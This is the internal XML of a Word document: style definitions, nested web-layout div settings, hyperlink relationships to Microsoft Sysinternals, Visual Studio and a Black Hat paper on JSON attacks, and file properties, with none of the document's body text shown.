    <w:rsid w:val="00682576"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mb-0">
    <w:name w:val="mb-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0068257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windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00682576"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-size-14">
    <w:name w:val="font-size-14"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0068257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customStyle="1" w:styleId="font-size-13">
    <w:name w:val="font-size-13"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0068257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color-white">
    <w:name w:val="color-white"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0068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20542">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="815990769">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1039941287">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="6224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0844">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1108550444">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="621880770">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="262303219">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16416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090">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1418749406">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="4558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312">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1660966213">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="4036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002">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1524174904">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="704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342">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="515658397">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="8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827">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="594434434">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1540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9211">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1072000419">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="21393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1857">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1816414210">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5826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54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learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf"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learn.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://visualstudio.microsoft.com/vs/community/"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1617</Words>
  <Characters>9220</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>76</Lines>
  <Paragraphs>21</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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2024-04-10T09:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T09:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>